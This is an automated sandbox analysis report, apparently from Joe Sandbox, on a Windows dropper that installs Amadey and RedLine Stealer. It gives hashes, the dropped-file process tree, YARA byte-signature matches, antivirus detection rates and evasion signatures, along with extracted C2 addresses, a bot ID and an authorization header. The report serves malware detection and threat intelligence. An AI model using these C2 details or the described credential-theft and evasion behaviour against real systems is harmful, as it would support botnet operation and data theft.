Edit tour

Windows Analysis Report
plEnknXWQD.exe

Overview

General Information

Sample Name:	plEnknXWQD.exe
Original Sample Name:	548ee02a30c2dcca5f3f91e90212ec29.exe
Analysis ID:	829681
MD5:	548ee02a30c2dcca5f3f91e90212ec29
SHA1:	cff21359a3498e3f3e8def5c553a626363b49922
SHA256:	3b6171920a1c00a384ac77f88d94b78d960bd317efc531748893edcd579e370e
Tags:	exeRedLineStealer
Infos:

Detection

Amadey, RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Yara detected Amadeys stealer DLL

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Detected unpacking (overwrites its own PE header)

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for domain / URL

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Disable Windows Defender real time protection (registry)

Machine Learning detection for sample

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Disable Windows Defender notifications (registry)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Found potential string decryption / allocating functions

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to read the PEB

Found evasive API chain checking for process token information

Binary contains a suspicious time stamp

Dropped file seen in connection with other malware

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

plEnknXWQD.exe (PID: 5516 cmdline: C:\Users\user\Desktop\plEnknXWQD.exe MD5: 548EE02A30C2DCCA5F3F91E90212EC29)

will6283.exe (PID: 5504 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe MD5: 52B9E7C5A314A3E0BD0AF989586DE77B)

will3629.exe (PID: 5480 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe MD5: 7543D15869BB6AF00305F1C7BA4F6B49)

will3971.exe (PID: 5456 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe MD5: 941C83F4C8AD9D1112BFC556CFA74167)

mx8896IL.exe (PID: 5584 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)

ns5251Ks.exe (PID: 5660 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe MD5: 79CBBF32E2376C4CADB2DFAD0ED320FA)

rundll32.exe (PID: 5612 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 1348 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 5284 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 1008 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about 500$ on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://asec.ahnlab.com/en/41450/ https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html https://blogs.blackberry.com/en/2020/01/threat-spotlight-amadey-bot https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/ https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: Amadey

{"C2 url": "62.204.41.87/joomla/index.php", "Version": "3.68"}

Threatname: RedLine

{"C2 url": "193.233.20.30:4125", "Bot Id": "vint", "Authorization Header": "fb8811912f8370b3d23bffda092d88d0"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a440:$pat14: , CommandLine: 0x134ad:$v2_1: ListOfProcesses 0x1328c:$v4_3: base64str 0x13e05:$v4_4: stringKey 0x11b63:$v4_5: BytesToStringConverted 0x10d76:$v4_6: FromBase64 0x12098:$v4_8: procName 0x12814:$v5_5: FileScanning 0x11d6c:$v5_7: RecordHeaderField 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000006.00000002.369287641.0000000002E16000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1738:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000006.00000002.368971043.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000006.00000002.368971043.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000006.00000003.336833965.0000000002C20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000006.00000003.336833965.0000000002C20000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000001.00000003.308015550.0000000004D3E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000003.307182274.0000000004904000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.ns5251Ks.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
6.2.ns5251Ks.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
6.3.ns5251Ks.exe.2c20000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
6.3.ns5251Ks.exe.2c20000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
6.2.ns5251Ks.exe.400000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
6.2.ns5251Ks.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
1.3.will6283.exe.4deee20.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.3.will6283.exe.4deee20.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a440:$pat14: , CommandLine: 0x134ad:$v2_1: ListOfProcesses 0x1328c:$v4_3: base64str 0x13e05:$v4_4: stringKey 0x11b63:$v4_5: BytesToStringConverted 0x10d76:$v4_6: FromBase64 0x12098:$v4_8: procName 0x12814:$v5_5: FileScanning 0x11d6c:$v5_7: RecordHeaderField 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
0.3.plEnknXWQD.exe.49d9220.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
6.2.ns5251Ks.exe.2bf0e67.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
6.2.ns5251Ks.exe.2bf0e67.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
1.3.will6283.exe.4deee20.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.3.will6283.exe.4deee20.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x18840:$pat14: , CommandLine: 0x118ad:$v2_1: ListOfProcesses 0x1168c:$v4_3: base64str 0x12205:$v4_4: stringKey 0xff63:$v4_5: BytesToStringConverted 0xf176:$v4_6: FromBase64 0x10498:$v4_8: procName 0x10c14:$v5_5: FileScanning 0x1016c:$v5_7: RecordHeaderField 0xfe34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
0.3.plEnknXWQD.exe.49d9220.0.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 9 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: plEnknXWQD.exe	ReversingLabs: Detection: 66%
Source: plEnknXWQD.exe	Virustotal: Detection: 52%			Perma Link

Antivirus / Scanner detection for submitted sample

Source: plEnknXWQD.exe

Avira: detected

Multi AV Scanner detection for domain / URL

Source: 62.204.41.87/joomla/index.php

Virustotal: Detection: 13%

Perma Link

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe	Avira: detection malicious, Label: HEUR/AGEN.1252166
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	Avira: detection malicious, Label: HEUR/AGEN.1252166

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exe	Virustotal: Detection: 84%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	Virustotal: Detection: 55%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe	ReversingLabs: Detection: 72%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe	Virustotal: Detection: 76%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	Virustotal: Detection: 55%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\py81WM70.exe	ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\py81WM70.exe	Virustotal: Detection: 50%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe	ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe	ReversingLabs: Detection: 88%
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	ReversingLabs: Detection: 46%

Machine Learning detection for sample

Source: plEnknXWQD.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\py81WM70.exe	Joe Sandbox ML: detected

Source: 00000001.00000003.308015550.0000000004D3E000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "193.233.20.30:4125", "Bot Id": "vint", "Authorization Header": "fb8811912f8370b3d23bffda092d88d0"}
Source: 0.3.plEnknXWQD.exe.49d9220.0.unpack	Malware Configuration Extractor: Amadey {"C2 url": "62.204.41.87/joomla/index.php", "Version": "3.68"}

Source: C:\Users\user\Desktop\plEnknXWQD.exe	Code function: 0_2_00382F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,	0_2_00382F1D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	Code function: 1_2_01062F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,	1_2_01062F1D
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	Code function: 2_2_00AC2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,	2_2_00AC2F1D
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe	Code function: 3_2_002F2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,	3_2_002F2F1D

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe

Unpacked PE file: 6.2.ns5251Ks.exe.400000.0.unpack

Source: plEnknXWQD.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: plEnknXWQD.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: wextract.pdb source: plEnknXWQD.exe, will3971.exe.2.dr, will6283.exe.0.dr, will3629.exe.1.dr
Source:	Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: plEnknXWQD.exe, 00000000.00000003.307182274.0000000004904000.00000004.00000020.00020000.00000000.sdmp, ry40VI69.exe.0.dr
Source:	Binary string: Healer.pdb source: ns5251Ks.exe, 00000006.00000003.338894865.0000000002E6F000.00000004.00000020.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369220126.0000000002D50000.00000004.08000000.00040000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.370344003.0000000004BD1000.00000004.00000800.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.371166445.0000000007090000.00000004.08000000.00040000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369448631.0000000004690000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wextract.pdbGCTL source: plEnknXWQD.exe, will3971.exe.2.dr, will6283.exe.0.dr, will3629.exe.1.dr
Source:	Binary string: <C:\zarepot\talotoyuy1\guf.pdb source: will3629.exe, 00000002.00000003.308857846.00000000049B0000.00000004.00000020.00020000.00000000.sdmp, py81WM70.exe.2.dr
Source:	Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: will3971.exe, 00000003.00000003.309941661.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, mx8896IL.exe, 00000004.00000000.310427980.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, mx8896IL.exe.3.dr
Source:	Binary string: C:\tugiwozexe-hon68\xozutuboreja.pdb source: will3971.exe, 00000003.00000003.309941661.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000000.335153117.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, ns5251Ks.exe.3.dr
Source:	Binary string: _.pdb source: ns5251Ks.exe, 00000006.00000003.338894865.0000000002E6F000.00000004.00000020.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369220126.0000000002D50000.00000004.08000000.00040000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.370344003.0000000004BD1000.00000004.00000800.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000003.346539295.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369448631.0000000004690000.00000004.00000020.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369340692.0000000002E81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\zarepot\talotoyuy1\guf.pdb source: will3629.exe, 00000002.00000003.308857846.00000000049B0000.00000004.00000020.00020000.00000000.sdmp, py81WM70.exe.2.dr
Source:	Binary string: Healer.pdbH5 source: ns5251Ks.exe, 00000006.00000003.338894865.0000000002E6F000.00000004.00000020.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369220126.0000000002D50000.00000004.08000000.00040000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.370344003.0000000004BD1000.00000004.00000800.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.371166445.0000000007090000.00000004.08000000.00040000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369448631.0000000004690000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\plEnknXWQD.exe	Code function: 0_2_00382390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00382390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	Code function: 1_2_01062390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_01062390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	Code function: 2_2_00AC2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	2_2_00AC2390
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe	Code function: 3_2_002F2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	3_2_002F2390

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 62.204.41.87/joomla/index.php
Source: Malware configuration extractor	URLs: 193.233.20.30:4125

Source: will6283.exe, 00000001.00000003.308015550.0000000004D3E000.00000004.00000020.00020000.00000000.sdmp, qs5212ER.exe.1.dr

String found in binary or memory: https://api.ip.sb/ip

Source: ns5251Ks.exe, 00000006.00000002.369263476.0000000002DFA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.ns5251Ks.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 6.3.ns5251Ks.exe.2c20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 6.2.ns5251Ks.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.3.will6283.exe.4deee20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 6.2.ns5251Ks.exe.2bf0e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.3.will6283.exe.4deee20.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000006.00000002.369287641.0000000002E16000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.368971043.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000003.336833965.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe, type: DROPPED	Matched rule: Detects RedLine infostealer Author: ditekSHen

Source: plEnknXWQD.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 6.2.ns5251Ks.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 6.3.ns5251Ks.exe.2c20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 6.2.ns5251Ks.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.3.will6283.exe.4deee20.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
